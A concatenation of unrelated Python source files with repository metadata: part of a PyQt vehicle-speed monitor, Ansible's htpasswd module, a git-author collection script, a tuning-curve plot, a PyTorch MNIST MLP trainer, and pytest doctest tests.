fps = 1.0/ (end_time - start_time)
# draw boxes for visualization
if len(outputs) > 0:
bbox_xyxy = outputs[:, :4]
identities = outputs[:, -1]
# Calculate speed
if(count_frame == 1):
car_ID = outputs[:, 4]
post_car = outputs[:, [0, 1, 2, 3]]
for ID in car_ID:
post = np.where(car_ID == ID)
carStartPosition[ID] = post_car[int(post[0]), :].tolist()
if(count_frame == 2):
car_ID = outputs[:, 4]
post_car = outputs[:, [0, 1, 2, 3]]
for ID in car_ID:
post = np.where(car_ID == ID)
carCurrentPosition[ID] = post_car[int(post[0]), :].tolist()
for ID in carStartPosition.keys():
if(ID in carStartPosition and ID in carCurrentPosition):
[x_s1, y_s1, x_s2, y_s2] = carStartPosition[ID]
[x_c1, y_c1, x_c2, y_c2] = carCurrentPosition[ID]
#carStartPosition[ID] = [x_c1, y_c1, x_c2, y_c2]
if ID not in speed:
speed_car = calculate_speed([x_s1, y_s1, x_s2, y_s2], [x_c1, y_c1, x_c2, y_c2], fps=fps)
speed[ID] = int(speed_car)
count_frame = 0
for id in violating_vehicle.keys():
img_crop = im0[violating_vehicle[id][1]:violating_vehicle[id][3], violating_vehicle[id][0]:violating_vehicle[id][2]]
if(img_crop.shape[0] > 0 and img_crop.shape[1]>0):
if not os.path.isfile(path_save_violating_vehicle + "{}.{}.jpg".format(fileName, id)):
cv2.imwrite(path_save_violating_vehicle + "{}.{}.jpg".format(fileName, id), img_crop)
imgFile = fileName + "." + str(id) + "." + "jpg"
sp = "{} km/h".format(speed[id])
SQL.queryNoReturn("Insert Into ViolatingVehicle Values ('{}', '{}', '{}', '{}', '{}')".format(id, sp, violating_name[id], violation_time[id], imgFile))
draw_boxes(im0, bbox_xyxy, identities, speed=speed)
else:
deepsort.increment_ages()
# Stream results
if view_vid:
im0S = cv2.resize(im0, (850, 480))
rgbImage = cv2.cvtColor(im0S, cv2.COLOR_BGR2RGB)
h, w, ch = rgbImage.shape
bytesPerLine = ch * w
convertToQtFormat = QImage(rgbImage.data, w, h, bytesPerLine, QImage.Format_RGB888)
p = convertToQtFormat.scaled(850, 480, Qt.KeepAspectRatio)
self.changePixmap.emit(p)
if save_vid:
if vid_path != save_path: # new video
vid_path = save_path
if isinstance(vid_writer, cv2.VideoWriter):
vid_writer.release() # release previous video writer
if vid_cap: # video
fps = vid_cap.get(cv2.CAP_PROP_FPS)
w = int(vid_cap.get(cv2.CAP_PROP_FRAME_WIDTH))
h = int(vid_cap.get(cv2.CAP_PROP_FRAME_HEIGHT))
else: # stream
fps, w, h = 30, im0.shape[1], im0.shape[0]
print(save_path)
save_path += '.mp4'
vid_writer = cv2.VideoWriter(save_path, cv2.VideoWriter_fourcc(*'mp4v'), fps, (w, h))
print(save_path)
vid_writer.write(im0)
class Monitoring(QFrame, Ui_Monitoring):
def __init__(self, parent=None):
QFrame.__init__(self, parent=parent)
self.setupUi(self)
self.comboInput.addItem("Video")
self.comboInput.addItem("Camera")
self.txtPPM.setText("1")
self.btEnd.setEnabled(False)
self.path = None
# Monitoring Video Thread
self.threadMonitoring = ThreadMonitoring(self)
self.threadMonitoring.changePixmap.connect(self.setImage)
# Event
self.btChooseVideo.clicked.connect(self.chooseVideo)
self.btStart.clicked.connect(self.startMonitoring)
self.btEnd.clicked.connect(self.endMonitoring)
@pyqtSlot(QImage)
def setImage(self, image):
self.lbImg.setPixmap(QPixmap.fromImage(image))
def alert(self, title, message):
msg = QtWidgets.QMessageBox()
msg.setIcon(QtWidgets.QMessageBox.Information)
msg.setText(message)
msg.setWindowTitle(title)
msg.exec_()
def chooseVideo(self):
#Show file dialog
global fileName
global videoFile
try:
options = QFileDialog.Options()
options |= QFileDialog.DontUseNativeDialog
video_path, _ = QFileDialog.getOpenFileName(None, "Choose Video", "","Video Files (*.mp4 *.avi);;All Files (*)", options = options)
if video_path is not None:
self.path = video_path
fileName = Path(video_path).resolve().stem
fileTail = os.path.splitext(video_path)[-1]
videoFile = fileName + fileTail
self.lbNameVideo.setText(videoFile)
except:
pass
def startMonitoring(self):
global flag
global pixels_per_meter
global fileName
global videoFile
if not self.txtPPM.text() == "":
if(float(self.txtPPM.text()) > 0):
pixels_per_meter = float(self.txtPPM.text())
#print(pixels_per_meter)
else:
self.alert(title="Cảnh báo", message="Pixel trên met phải lớn hơn 0, \n Hệ thống sẽ cài đặt mặc định")
else:
pixels_per_meter = 1
if(self.comboInput.currentText() == "Camera"):
if not flag:
fileName = "webcam0"
videoFile = "Webcam0.mp4"
flag = True
self.threadMonitoring.setPath(path="0")
self.threadMonitoring.start()
if(self.path is None and self.comboInput.currentText() == "Video"):
self.alert(title="Cảnh báo", message="Không có vide được chọn!")
else:
if not flag:
self.btStart.setEnabled(False)
self.btEnd.setEnabled(True)
flag = True
self.threadMonitoring.setPath(path=self.path)
self.threadMonitoring.start()
def endMonitoring(self):
global flag
if flag:
flag = False
self.threadMonitoring.exit()
self.btEnd.setEnabled(False)
self.btStart.setEnabled(True)
if not flag:
cleanDictSpeed()
| 41.8 | 191 | 0.527811 |
984e1b1e356b23b0ce904f5c8ff3909af6b45cb4 | 8,684 | py | Python | venv/lib/python2.7/site-packages/ansible/modules/web_infrastructure/htpasswd.py | haind27/test01 | 7f86c0a33eb0874a6c3f5ff9a923fd0cfc8ef852 | [
"MIT"
] | 37 | 2017-08-15T15:02:43.000Z | 2021-07-23T03:44:31.000Z | venv/lib/python2.7/site-packages/ansible/modules/web_infrastructure/htpasswd.py | haind27/test01 | 7f86c0a33eb0874a6c3f5ff9a923fd0cfc8ef852 | [
"MIT"
] | 12 | 2018-01-10T05:25:25.000Z | 2021-11-28T06:55:48.000Z | venv/lib/python2.7/site-packages/ansible/modules/web_infrastructure/htpasswd.py | haind27/test01 | 7f86c0a33eb0874a6c3f5ff9a923fd0cfc8ef852 | [
"MIT"
] | 49 | 2017-08-15T09:52:13.000Z | 2022-03-21T17:11:54.000Z | #!/usr/bin/python
# -*- coding: utf-8 -*-
# (c) 2013, Nimbis Services, Inc.
# GNU General Public License v3.0+ (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt)
from __future__ import absolute_import, division, print_function
__metaclass__ = type
ANSIBLE_METADATA = {'metadata_version': '1.1',
'status': ['preview'],
'supported_by': 'community'}
DOCUMENTATION = """
module: htpasswd
version_added: "1.3"
short_description: manage user files for basic authentication
description:
- Add and remove username/password entries in a password file using htpasswd.
- This is used by web servers such as Apache and Nginx for basic authentication.
options:
path:
required: true
aliases: [ dest, destfile ]
description:
- Path to the file that contains the usernames and passwords
name:
required: true
aliases: [ username ]
description:
- User name to add or remove
password:
required: false
description:
- Password associated with user.
- Must be specified if user does not exist yet.
crypt_scheme:
required: false
choices: ["apr_md5_crypt", "des_crypt", "ldap_sha1", "plaintext"]
default: "apr_md5_crypt"
description:
- Encryption scheme to be used. As well as the four choices listed
here, you can also use any other hash supported by passlib, such as
md5_crypt and sha256_crypt, which are linux passwd hashes. If you
do so the password file will not be compatible with Apache or Nginx
state:
required: false
choices: [ present, absent ]
default: "present"
description:
- Whether the user entry should be present or not
create:
required: false
type: bool
default: "yes"
description:
- Used with C(state=present). If specified, the file will be created
if it does not already exist. If set to "no", will fail if the
file does not exist
notes:
- "This module depends on the I(passlib) Python library, which needs to be installed on all target systems."
- "On Debian, Ubuntu, or Fedora: install I(python-passlib)."
- "On RHEL or CentOS: Enable EPEL, then install I(python-passlib)."
requirements: [ passlib>=1.6 ]
author: "Ansible Core Team"
extends_documentation_fragment: files
"""
EXAMPLES = """
# Add a user to a password file and ensure permissions are set
- htpasswd:
path: /etc/nginx/passwdfile
name: janedoe
password: '9s36?;fyNp'
owner: root
group: www-data
mode: 0640
# Remove a user from a password file
- htpasswd:
path: /etc/apache2/passwdfile
name: foobar
state: absent
# Add a user to a password file suitable for use by libpam-pwdfile
- htpasswd:
path: /etc/mail/passwords
name: alex
password: oedu2eGh
crypt_scheme: md5_crypt
"""
import os
import tempfile
from distutils.version import LooseVersion
from ansible.module_utils.basic import AnsibleModule
from ansible.module_utils._text import to_native
try:
from passlib.apache import HtpasswdFile, htpasswd_context
from passlib.context import CryptContext
import passlib
except ImportError:
passlib_installed = False
else:
passlib_installed = True
apache_hashes = ["apr_md5_crypt", "des_crypt", "ldap_sha1", "plaintext"]
def create_missing_directories(dest):
destpath = os.path.dirname(dest)
if not os.path.exists(destpath):
os.makedirs(destpath)
def present(dest, username, password, crypt_scheme, create, check_mode):
""" Ensures user is present
Returns (msg, changed) """
if crypt_scheme in apache_hashes:
context = htpasswd_context
else:
context = CryptContext(schemes=[crypt_scheme] + apache_hashes)
if not os.path.exists(dest):
if not create:
raise ValueError('Destination %s does not exist' % dest)
if check_mode:
return ("Create %s" % dest, True)
create_missing_directories(dest)
if LooseVersion(passlib.__version__) >= LooseVersion('1.6'):
ht = HtpasswdFile(dest, new=True, default_scheme=crypt_scheme, context=context)
else:
ht = HtpasswdFile(dest, autoload=False, default=crypt_scheme, context=context)
if getattr(ht, 'set_password', None):
ht.set_password(username, password)
else:
ht.update(username, password)
ht.save()
return ("Created %s and added %s" % (dest, username), True)
else:
if LooseVersion(passlib.__version__) >= LooseVersion('1.6'):
ht = HtpasswdFile(dest, new=False, default_scheme=crypt_scheme, context=context)
else:
ht = HtpasswdFile(dest, default=crypt_scheme, context=context)
found = None
if getattr(ht, 'check_password', None):
found = ht.check_password(username, password)
else:
found = ht.verify(username, password)
if found:
return ("%s already present" % username, False)
else:
if not check_mode:
if getattr(ht, 'set_password', None):
ht.set_password(username, password)
else:
ht.update(username, password)
ht.save()
return ("Add/update %s" % username, True)
def absent(dest, username, check_mode):
""" Ensures user is absent
Returns (msg, changed) """
if LooseVersion(passlib.__version__) >= LooseVersion('1.6'):
ht = HtpasswdFile(dest, new=False)
else:
ht = HtpasswdFile(dest)
if username not in ht.users():
return ("%s not present" % username, False)
else:
if not check_mode:
ht.delete(username)
ht.save()
return ("Remove %s" % username, True)
def check_file_attrs(module, changed, message):
file_args = module.load_file_common_arguments(module.params)
if module.set_fs_attributes_if_different(file_args, False):
if changed:
message += " and "
changed = True
message += "ownership, perms or SE linux context changed"
return message, changed
def main():
arg_spec = dict(
path=dict(required=True, aliases=["dest", "destfile"]),
name=dict(required=True, aliases=["username"]),
password=dict(required=False, default=None, no_log=True),
crypt_scheme=dict(required=False, default="apr_md5_crypt"),
state=dict(required=False, default="present"),
create=dict(type='bool', default='yes'),
)
module = AnsibleModule(argument_spec=arg_spec,
add_file_common_args=True,
supports_check_mode=True)
path = module.params['path']
username = module.params['name']
password = module.params['password']
crypt_scheme = module.params['crypt_scheme']
state = module.params['state']
create = module.params['create']
check_mode = module.check_mode
if not passlib_installed:
module.fail_json(msg="This module requires the passlib Python library")
# Check file for blank lines in effort to avoid "need more than 1 value to unpack" error.
try:
f = open(path, "r")
except IOError:
# No preexisting file to remove blank lines from
f = None
else:
try:
lines = f.readlines()
finally:
f.close()
# If the file gets edited, it returns true, so only edit the file if it has blank lines
strip = False
for line in lines:
if not line.strip():
strip = True
break
if strip:
# If check mode, create a temporary file
if check_mode:
temp = tempfile.NamedTemporaryFile()
path = temp.name
f = open(path, "w")
try:
[f.write(line) for line in lines if line.strip()]
finally:
f.close()
try:
if state == 'present':
(msg, changed) = present(path, username, password, crypt_scheme, create, check_mode)
elif state == 'absent':
if not os.path.exists(path):
module.exit_json(msg="%s not present" % username,
warnings="%s does not exist" % path, changed=False)
(msg, changed) = absent(path, username, check_mode)
else:
module.fail_json(msg="Invalid state: %s" % state)
check_file_attrs(module, changed, msg)
module.exit_json(msg=msg, changed=changed)
except Exception as e:
module.fail_json(msg=to_native(e))
if __name__ == '__main__':
main()
| 31.926471 | 110 | 0.630815 |
33d3ad77b7e98a7f0c9621d698f0aed0dca4ca4a | 2,032 | py | Python | get_authors.py | fermi-controls/redmine-git-authors | 2c8d52a7ddcebbd229e9735074e4a8def7e44734 | [
"MIT"
] | null | null | null | get_authors.py | fermi-controls/redmine-git-authors | 2c8d52a7ddcebbd229e9735074e4a8def7e44734 | [
"MIT"
] | null | null | null | get_authors.py | fermi-controls/redmine-git-authors | 2c8d52a7ddcebbd229e9735074e4a8def7e44734 | [
"MIT"
] | null | null | null | #!/usr/bin/env python3
"""Get the list of unique authors and contributors from Redmine."""
import json
from pathlib import Path
import subprocess
names = set()
output_path = Path('./authors.txt')
def xlat_with(input_dict):
"""Translate the author name."""
input_keys = input_dict.keys()
return lambda v: v if v not in input_keys else input_dict[v]
def mk_key(combined_name):
"""Make a key from the author's name."""
try:
[first_name, last_name] = combined_name.split()
except ValueError as errormsg:
print(errormsg, '\n', combined_name)
# ! is a low value in the ASCII table
# This filters the author names that need to be fixed to the top
return ['!FIX', combined_name]
return [last_name, first_name]
with open('projects.json', encoding='utf8') as f_projects, \
open('usernames.json', encoding='utf8') as f_usernames:
projects = json.load(f_projects)
usernames_map = json.load(f_usernames)
usernames = usernames_map.keys()
for project in projects.keys():
for repo in projects[project]:
result = subprocess.run([
'ssh', '-tx', f'p-{project}@cdcvs.fnal.gov',
f'git -C /cvs/projects/{repo} log --pretty=\'%an%n%cn\'',
'|', 'sort', '-u'],
stdout=subprocess.PIPE, check=True, encoding='utf8')
if result.returncode != 0:
print('Return code', result.returncode, f'{project}/{repo} failed.')
continue
if result.stdout.startswith('fatal:'):
print(f'{project}/{repo} failed.')
print(result.stdout)
continue
results = result.stdout.splitlines()
subbed_names = map(xlat_with(usernames_map), results)
names |= set(subbed_names)
with open(output_path, 'w', encoding='utf8') as f:
for name in sorted(names, key=mk_key):
f.write(f'{name}\n')
print('Output author names to', output_path.absolute())
| 31.261538 | 84 | 0.607283 |
1fe4445681c2a5bd1b10ef6585e60db930cd8a10 | 455 | py | Python | tutorials/W3D4_DeepLearning1/solutions/W3D4_Tutorial1_Solution_2a11ec87.py | liuxiaomiao123/NeuroMathAcademy | 16a7969604a300bf9fbb86f8a5b26050ebd14c65 | [
"CC-BY-4.0"
] | 2 | 2020-07-03T04:39:09.000Z | 2020-07-12T02:08:31.000Z | tutorials/W3D4_DeepLearning1/solutions/W3D4_Tutorial1_Solution_2a11ec87.py | NinaHKivanani/course-content | 3c91dd1a669cebce892486ba4f8086b1ef2e1e49 | [
"CC-BY-4.0"
] | 1 | 2020-06-22T22:57:03.000Z | 2020-06-22T22:57:03.000Z | tutorials/W3D4_DeepLearning1/solutions/W3D4_Tutorial1_Solution_2a11ec87.py | NinaHKivanani/course-content | 3c91dd1a669cebce892486ba4f8086b1ef2e1e49 | [
"CC-BY-4.0"
] | 1 | 2021-03-29T21:08:26.000Z | 2021-03-29T21:08:26.000Z | def plot_tuning():
"""Plot the tuning curve of a random neuron"""
neuron_indx = np.random.choice(n_neurons) # pick random neuron
plt.plot(np.rad2deg(stimuli), resp[:, neuron_indx], '.') # plot its responses as a function of stimulus orientation
plt.title('neuron %i' % neuron_indx)
plt.xlabel('stimulus orientation ($^o$)')
plt.ylabel('neural response')
plt.xticks(np.linspace(0, 360, 5))
plt.show()
with plt.xkcd():
plot_tuning() | 32.5 | 118 | 0.69011 |
9d394e96942e4c5f65e52e1f00e476f2d4883fa9 | 6,542 | py | Python | mlp/mlp.py | Yuxiang-Wei/DeepLearning | 5ad27384a6b45b97700094fe979a67b0d1522be8 | [
"MIT"
] | 7 | 2019-06-28T15:21:20.000Z | 2020-04-22T14:35:35.000Z | mlp/mlp.py | csyxwei/DeepLearning | 5ad27384a6b45b97700094fe979a67b0d1522be8 | [
"MIT"
] | null | null | null | mlp/mlp.py | csyxwei/DeepLearning | 5ad27384a6b45b97700094fe979a67b0d1522be8 | [
"MIT"
] | 1 | 2019-07-02T03:33:37.000Z | 2019-07-02T03:33:37.000Z | #!/usr/bin/env python
# -*- coding: utf-8 -*-
# @Time : 19-5-10
# @Author : wyxiang
# @File : mlp.py
# @Env: Ubuntu16.04 Python3.6 Pytorch0.4.1
import torch
import torch.nn as nn
import torch.nn.functional as F
from torchvision import datasets, transforms
from torch.utils.data.dataloader import DataLoader
from optparse import OptionParser
import os
# 判断CUDA是否可用
if torch.cuda.is_available():
device = torch.device('cuda')
else:
device = torch.device('cpu')
print('Using PyTorch version:', torch.__version__, ' Device:', device)
img_size = 28
output_size = 10
model_dir = './checkpoints/lastest.pkl' # 模型存放地址
# 定义模型
class MLP(nn.Module):
def __init__(self):
super(MLP, self).__init__()
self.linear1 = nn.Linear(img_size * img_size, 1024) # 隐层1, [784,1] -> [1024,1]
self.linear2 = nn.Linear(1024, 256) # 隐层2, [1024,1] -> [256,1]
self.linear3 = nn.Linear(256, output_size) # 隐层3 [256,1] -> [10,1]
def forward(self, x):
# 将图片展开成一维,以匹配的输入层大小,即[batch, 1, img_size, img_size] -> [batch, img_size*img_size]
x = x.view(-1, img_size * img_size)
x = F.relu(self.linear1(x)) # 经过隐层1并使用relu函数激活
x = F.relu(self.linear2(x)) # 经过隐层2并使用relu函数激活
return F.log_softmax(self.linear3(x), dim=1) # 经过隐层3,并最终经过一个log_softmax层做分类输出
def load_data(train=True, batch_size=50):
"""
加载数据集
:param train: 训练集 or 测试集
:param batch_size: batch的大小
:return: 返回加载好的Dataloader
"""
# 加载MNIST数据集,若不存在则下载
dataset = datasets.MNIST('./data',
train=train,
download=True,
transform=transforms.ToTensor())
if train:
# 分为训练集和验证集
train, val = torch.utils.data.random_split(dataset, [50000, 10000])
# 随机打乱训练集
train_loader = DataLoader(dataset=train,
batch_size=batch_size,
shuffle=True)
# 准备验证集
val_loader = DataLoader(dataset=val,
batch_size=batch_size,
shuffle=True)
return train_loader, val_loader
else:
# 准备测试集
test_loader = DataLoader(dataset=dataset,
batch_size=batch_size,
shuffle=False)
return test_loader, None
def train(model, epochs, batch_size, lr, log_interval=200):
"""
训练网络模型
:param model: 待训练网络
:param epochs: 迭代次数
:param batch_size: batch size
:param lr: 学习率
:param log_interval: 打印loss的间隔次数
:return:
"""
# 加载训练集,验证集
train_loader, val_loader = load_data(train=True, batch_size=batch_size)
# 使用Adam优化器
optimizer = torch.optim.Adam(model.parameters(), lr=lr)
# optimizer = torch.optim.SGD(model.parameters(), lr=0.01, momentum=0.5)
# 使用交叉熵损失
criterion = nn.CrossEntropyLoss()
for i in range(1, epochs + 1):
# model设置为训练模式
model.train()
# 遍历每个batch
for batch_idx, (data, target) in enumerate(train_loader):
# 若GPU可用,拷贝数据至GPU
data = data.to(device)
target = target.to(device)
# 将梯度缓存置0
optimizer.zero_grad()
# 执行一次前向传播
output = model(data)
# 计算loss
loss = criterion(output, target)
# 反向传播
loss.backward()
# 更新权值
optimizer.step()
# 打印loss信息
if batch_idx % log_interval == 0:
print('Train Epoch: {} [{}/{} ({:.0f}%)]\tLoss: {:.6f}'.format(
i, batch_idx * len(data), len(train_loader.dataset),
100. * batch_idx / len(train_loader), loss.data.item()))
# 保存模型参数, 这里设定每个epoch保存一次
save_dir = './checkpoints'
if not os.path.exists(save_dir):
os.makedirs(save_dir)
torch.save(model.state_dict(), os.path.join(save_dir, 'lastest.pkl'))
# 测试模型在验证集上的正确率
validate(model, val_loader, criterion)
def test(model, batch_size):
"""
测试模型在测试集上的正确率
:param model: 模型
:param batch_size: batch size
:return:
"""
test_loader, _ = load_data(train=False, batch_size=batch_size)
criterion = nn.CrossEntropyLoss()
validate(model, test_loader, criterion)
def validate(model, data_loader, criterion):
"""
测试模型在给定数据上的正确率
:param model: 模型
:param data_loader: 给定数据集
:param criterion: 损失函数
:return:
"""
# 设定模型为执行模式
model.eval()
val_loss, correct = 0, 0
for data, target in data_loader:
# 若GPU可用,拷贝数据至GPU
data = data.to(device)
target = target.to(device)
# 前向传播
output = model(data)
# 计算loss
val_loss += criterion(output, target).data.item()
# 获得概率最大的下标,即分类结果
pred = output.data.max(1)[1]
# 计算正确个数
correct += pred.eq(target.data).cpu().sum()
val_loss /= len(data_loader)
accuracy = 100. * correct.to(torch.float32) / len(data_loader.dataset)
print('\nValidation set: Average loss: {:.4f}, Accuracy: {}/{} ({:.0f}%)\n'.format(
val_loss, correct, len(data_loader.dataset), accuracy))
def get_args():
"""
解析命令行参数
:return: 参数列表
"""
parser = OptionParser()
parser.add_option('-t', '--train', action="store_true", dest='train', default=True,
help='train model')
parser.add_option("-v", '--test', action="store_false", dest="train",
help='test model')
parser.add_option('-e', '--epochs', dest='epochs', default=10, type='int',
help='number of epochs')
parser.add_option('-b', '--batch_size', dest='batchsize', default=50,
type='int', help='batch size')
parser.add_option('-l', '--lr', dest='lr', default=0.001,
type='float', help='learning rate')
(options, args) = parser.parse_args()
return options
if __name__ == '__main__':
args = get_args()
model = MLP().to(device)
if args.train:
print(model)
train(model, epochs=args.epochs, batch_size=args.batchsize, lr=args.lr)
else:
if not os.path.exists(model_dir):
print('model not found')
else:
model.load_state_dict(torch.load(model_dir))
test(model, batch_size=args.batchsize)
# 运行示例
### 训练模型
# python mlp.py --train True --epochs 10 --batch_size 50 --lr 1e-3
### 测试模型
# python mlp.py --test True --batch_size 50 | 31.301435 | 90 | 0.576888 |
e1a083851a06d03379c8ce0652a6846ce73ba485 | 2,110 | py | Python | birthday_calendar/__main__.py | Raiytak/Birthday-Calendar | 879a268439503bc3debec9fca6363c9da44829a7 | [
"MIT"
] | null | null | null | birthday_calendar/__main__.py | Raiytak/Birthday-Calendar | 879a268439503bc3debec9fca6363c9da44829a7 | [
"MIT"
] | null | null | null | birthday_calendar/__main__.py | Raiytak/Birthday-Calendar | 879a268439503bc3debec9fca6363c9da44829a7 | [
"MIT"
] | null | null | null | import argparse
from .accessor import BirthdayAccessor
from .convert import convertDictToBirthdays
from .app_shell import AppShell
from .app_func import AppFunctionalities
"""
Main script
Handles the arguments and craetes a mixin with the shell, core functions and accessor
"""
class MainApp(AppFunctionalities, AppShell):
def __init__(self, birthday_accessor, birthday_convertor, *args, **kwargs):
self.birthday_accessor = birthday_accessor
self.birthday_convertor = birthday_convertor
super().__init__(*args, **kwargs)
def birthdays_data(self):
return birthday_accessor.getData()
def birthdays_data_from_user(self):
if birthday_accessor.user_file:
return birthday_accessor.getDataOfJson(birthday_accessor.user_file)
return {}
@property
def birthdays(self):
data = self.birthdays_data()
return self.birthday_convertor(data)
@property
def birthdays_from_user(self):
data = self.birthdays_data_from_user()
return self.birthday_convertor(data)
def saveBirthday(self, birthday):
return self.birthday_accessor.saveBirthday(birthday)
def saveBirthdayInCache(self, birthday):
return self.birthday_accessor.saveBirthdayInCache(birthday)
def deleteIdentifer(self, identifier):
return self.birthday_accessor.removeBirthdayWithIdentifier(identifier)
def setUserFilePath(self, path):
self.birthday_accessor.setUserFilePath(path)
def clearCache(self):
self.birthday_accessor.clearCache()
parser = argparse.ArgumentParser()
parser.add_argument(
"-p",
"--path",
help="Path to the json containing the information on the birthdays' person name and date",
type=str,
)
parser.add_argument(
"-y",
"--years",
help="Number of years around today's year on which the birthdays are added to the calendar (minimum 1)",
type=int,
)
args = parser.parse_args()
birthday_accessor = BirthdayAccessor(args.path)
main_app = MainApp(birthday_accessor, convertDictToBirthdays, args.years)
main_app.launchCalendar()
| 28.90411 | 108 | 0.732227 |
b15067f15e9b299586b8c31ce9467c984c2cf2dc | 32,516 | py | Python | tools/third_party/pytest/testing/test_doctest.py | shs96c/web-platform-tests | 61acad6dd9bb99d32340eb41f5146de64f542359 | [
"BSD-3-Clause"
] | 1 | 2018-02-26T09:45:53.000Z | 2018-02-26T09:45:53.000Z | tools/third_party/pytest/testing/test_doctest.py | shs96c/web-platform-tests | 61acad6dd9bb99d32340eb41f5146de64f542359 | [
"BSD-3-Clause"
] | null | null | null | tools/third_party/pytest/testing/test_doctest.py | shs96c/web-platform-tests | 61acad6dd9bb99d32340eb41f5146de64f542359 | [
"BSD-3-Clause"
] | 1 | 2021-04-06T20:06:58.000Z | 2021-04-06T20:06:58.000Z | # encoding: utf-8
from __future__ import absolute_import, division, print_function
import sys
import _pytest._code
from _pytest.compat import MODULE_NOT_FOUND_ERROR
from _pytest.doctest import DoctestItem, DoctestModule, DoctestTextfile
import pytest
class TestDoctests(object):
def test_collect_testtextfile(self, testdir):
w = testdir.maketxtfile(whatever="")
checkfile = testdir.maketxtfile(test_something="""
alskdjalsdk
>>> i = 5
>>> i-1
4
""")
for x in (testdir.tmpdir, checkfile):
# print "checking that %s returns custom items" % (x,)
items, reprec = testdir.inline_genitems(x)
assert len(items) == 1
assert isinstance(items[0], DoctestItem)
assert isinstance(items[0].parent, DoctestTextfile)
# Empty file has no items.
items, reprec = testdir.inline_genitems(w)
assert len(items) == 0
def test_collect_module_empty(self, testdir):
path = testdir.makepyfile(whatever="#")
for p in (path, testdir.tmpdir):
items, reprec = testdir.inline_genitems(p,
'--doctest-modules')
assert len(items) == 0
def test_collect_module_single_modulelevel_doctest(self, testdir):
path = testdir.makepyfile(whatever='""">>> pass"""')
for p in (path, testdir.tmpdir):
items, reprec = testdir.inline_genitems(p,
'--doctest-modules')
assert len(items) == 1
assert isinstance(items[0], DoctestItem)
assert isinstance(items[0].parent, DoctestModule)
def test_collect_module_two_doctest_one_modulelevel(self, testdir):
path = testdir.makepyfile(whatever="""
'>>> x = None'
def my_func():
">>> magic = 42 "
""")
for p in (path, testdir.tmpdir):
items, reprec = testdir.inline_genitems(p,
'--doctest-modules')
assert len(items) == 2
assert isinstance(items[0], DoctestItem)
assert isinstance(items[1], DoctestItem)
assert isinstance(items[0].parent, DoctestModule)
assert items[0].parent is items[1].parent
def test_collect_module_two_doctest_no_modulelevel(self, testdir):
path = testdir.makepyfile(whatever="""
'# Empty'
def my_func():
">>> magic = 42 "
def unuseful():
'''
# This is a function
# >>> # it doesn't have any doctest
'''
def another():
'''
# This is another function
>>> import os # this one does have a doctest
'''
""")
for p in (path, testdir.tmpdir):
items, reprec = testdir.inline_genitems(p,
'--doctest-modules')
assert len(items) == 2
assert isinstance(items[0], DoctestItem)
assert isinstance(items[1], DoctestItem)
assert isinstance(items[0].parent, DoctestModule)
assert items[0].parent is items[1].parent
def test_simple_doctestfile(self, testdir):
p = testdir.maketxtfile(test_doc="""
>>> x = 1
>>> x == 1
False
""")
reprec = testdir.inline_run(p, )
reprec.assertoutcome(failed=1)
def test_new_pattern(self, testdir):
p = testdir.maketxtfile(xdoc="""
>>> x = 1
>>> x == 1
False
""")
reprec = testdir.inline_run(p, "--doctest-glob=x*.txt")
reprec.assertoutcome(failed=1)
def test_multiple_patterns(self, testdir):
"""Test support for multiple --doctest-glob arguments (#1255).
"""
testdir.maketxtfile(xdoc="""
>>> 1
1
""")
testdir.makefile('.foo', test="""
>>> 1
1
""")
testdir.maketxtfile(test_normal="""
>>> 1
1
""")
expected = set(['xdoc.txt', 'test.foo', 'test_normal.txt'])
assert set(x.basename for x in testdir.tmpdir.listdir()) == expected
args = ["--doctest-glob=xdoc*.txt", "--doctest-glob=*.foo"]
result = testdir.runpytest(*args)
result.stdout.fnmatch_lines([
'*test.foo *',
'*xdoc.txt *',
'*2 passed*',
])
result = testdir.runpytest()
result.stdout.fnmatch_lines([
'*test_normal.txt *',
'*1 passed*',
])
@pytest.mark.parametrize(
' test_string, encoding',
[
(u'foo', 'ascii'),
(u'öäü', 'latin1'),
(u'öäü', 'utf-8')
]
)
def test_encoding(self, testdir, test_string, encoding):
"""Test support for doctest_encoding ini option.
"""
testdir.makeini("""
[pytest]
doctest_encoding={0}
""".format(encoding))
doctest = u"""
>>> u"{0}"
{1}
""".format(test_string, repr(test_string))
testdir._makefile(".txt", [doctest], {}, encoding=encoding)
result = testdir.runpytest()
result.stdout.fnmatch_lines([
'*1 passed*',
])
def test_doctest_unexpected_exception(self, testdir):
testdir.maketxtfile("""
>>> i = 0
>>> 0 / i
2
""")
result = testdir.runpytest("--doctest-modules")
result.stdout.fnmatch_lines([
"*unexpected_exception*",
"*>>> i = 0*",
"*>>> 0 / i*",
"*UNEXPECTED*ZeroDivision*",
])
def test_docstring_partial_context_around_error(self, testdir):
"""Test that we show some context before the actual line of a failing
doctest.
"""
testdir.makepyfile('''
def foo():
"""
text-line-1
text-line-2
text-line-3
text-line-4
text-line-5
text-line-6
text-line-7
text-line-8
text-line-9
text-line-10
text-line-11
>>> 1 + 1
3
text-line-after
"""
''')
result = testdir.runpytest('--doctest-modules')
result.stdout.fnmatch_lines([
'*docstring_partial_context_around_error*',
'005*text-line-3',
'006*text-line-4',
'013*text-line-11',
'014*>>> 1 + 1',
'Expected:',
' 3',
'Got:',
' 2',
])
# lines below should be trimmed out
assert 'text-line-2' not in result.stdout.str()
assert 'text-line-after' not in result.stdout.str()
def test_docstring_full_context_around_error(self, testdir):
"""Test that we show the whole context before the actual line of a failing
doctest, provided that the context is up to 10 lines long.
"""
testdir.makepyfile('''
def foo():
"""
text-line-1
text-line-2
>>> 1 + 1
3
"""
''')
result = testdir.runpytest('--doctest-modules')
result.stdout.fnmatch_lines([
'*docstring_full_context_around_error*',
'003*text-line-1',
'004*text-line-2',
'006*>>> 1 + 1',
'Expected:',
' 3',
'Got:',
' 2',
])
def test_doctest_linedata_missing(self, testdir):
testdir.tmpdir.join('hello.py').write(_pytest._code.Source("""
class Fun(object):
@property
def test(self):
'''
>>> a = 1
>>> 1/0
'''
"""))
result = testdir.runpytest("--doctest-modules")
result.stdout.fnmatch_lines([
"*hello*",
"*EXAMPLE LOCATION UNKNOWN, not showing all tests of that example*",
"*1/0*",
"*UNEXPECTED*ZeroDivision*",
"*1 failed*",
])
def test_doctest_unex_importerror_only_txt(self, testdir):
testdir.maketxtfile("""
>>> import asdalsdkjaslkdjasd
>>>
""")
result = testdir.runpytest()
# doctest is never executed because of error during hello.py collection
result.stdout.fnmatch_lines([
"*>>> import asdals*",
"*UNEXPECTED*{e}*".format(e=MODULE_NOT_FOUND_ERROR),
"{e}: No module named *asdal*".format(e=MODULE_NOT_FOUND_ERROR),
])
